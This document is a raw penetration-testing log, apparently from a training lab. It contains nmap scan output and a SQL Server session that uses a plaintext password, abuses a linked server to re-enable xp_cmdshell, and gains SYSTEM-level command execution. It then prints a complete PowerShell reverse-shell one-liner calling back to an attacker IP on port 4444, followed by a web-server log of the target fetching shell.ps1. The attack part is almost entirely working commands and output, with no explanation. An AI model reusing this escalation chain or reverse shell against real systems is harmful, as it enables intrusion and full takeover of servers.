ht2CfD3fEZpJXIdWLswh20pFoOKZoQS7E46XsXsms/pE1mxNQpF9qlZs2vQjDQE6 | gOTJjCg/dDGbdFfarX9eYZvyR4Sn1pIogQIDAQABoyQwIjATBgNVHSUEDDAKBggr | BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAH/ehuZc/n5G | HTqhULmAFoPTI9gGAR97yCLW9WMGERe9fXddv8FFsBmNopSW/8bL56TnkrJ7Bm5D | K9Npgc7KXMQhNAcRUytPVpsZzVjLOMZO1GK5o5XrKYmdkvT7CELu5RszWDFXLVnO | uPWJajPJldXmUxQm/3KnDjIe8127gdgKjkseu+8NPy5DPu9F1RzVoU3YpULhpxFo | lHyEWgtpryjKwQ3B6wtC4EBXrOU2P7r7uqhXvBQ0SfjOyauJ7ceAxVD6vOBXeJyF | MuBvUymzm57G1vyGIpa9ak4LaMsIv/0FSLW0dO94jlT16zY5oPrNBrCPf27zzGk9 | XcMzLaIROC0= |_-----END CERTIFICATE----- |_ssl-date: 2024-04-04T14:55:03+00:00; +27s from scanner time. 5985/tcp filtered wsman no-response 47001/tcp filtered winrm no-response 49664/tcp filtered unknown no-response 49665/tcp filtered unknown no-response 49666/tcp filtered unknown no-response 49667/tcp filtered unknown no-response 49668/tcp filtered unknown no-response 49669/tcp filtered unknown no-response 49670/tcp filtered unknown no-response 49697/tcp filtered unknown no-response Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-04-04T14:54:31 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: 26s, deviation: 0s, median: 26s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 64644/tcp): CLEAN (Timeout) | Check 2 (port 16127/tcp): CLEAN (Timeout) | Check 3 (port 9132/udp): CLEAN (Timeout) | Check 4 (port 26116/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 10:54 Completed NSE at 10:54, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 10:54 Completed NSE at 10:54, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 10:54 Completed NSE at 10:54, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 186.62 seconds

sqsh -S 10.129.203.10 -U '.\\fiona' -P '48Ns72!bns74@S84NNNSl' -h sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp This is free software with ABSOLUTELY NO WARRANTY For more information type '\warranty 1>

1> SELECT srvname, isremote FROM sysservers 2> go WINSRV02\SQLEXPRESS 1 LOCAL.TEST.LINKED.SRV 0

1> SELECT distinct b.name 2> FROM sys.server_permissions a 3> INNER JOIN sys.server_principals b 4> ON a.grantor_principal_id = b.principal_id 5> WHERE a.permission_name = 'IMPERSONATE' 6> go john simon

1> EXECUTE AS LOGIN = 'john' 2> SELECT SYSTEM_USER 3> SELECT IS_SRVROLEMEMBER('sysadmin') 4> go john 0

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV] 2> go WINSRV02\SQLEXPRESS Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor) testadmin 1

1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]; 2> go Msg 15281, Level 16, State 1 Server 'WIN-HARD\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

1> EXECUTE(' 2> EXEC sp_configure ''show advanced options'', 1; 3> RECONFIGURE; 4> EXEC sp_configure ''xp_cmdshell'', 1; 5> RECONFIGURE; 6> EXEC xp_cmdshell ''whoami'' 7> ') AT [LOCAL.TEST.LINKED.SRV]; 8> go Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. nt authority\system

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.165',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.129.203.10 - - [05/Apr/2024 06:54:11] "GET /shell.ps1 HTTP/1.1" 200 - 10.129.203.10 - - [05/Apr/2024 06:55:52] "GET /shell.ps1 HTTP/1.1" 200 -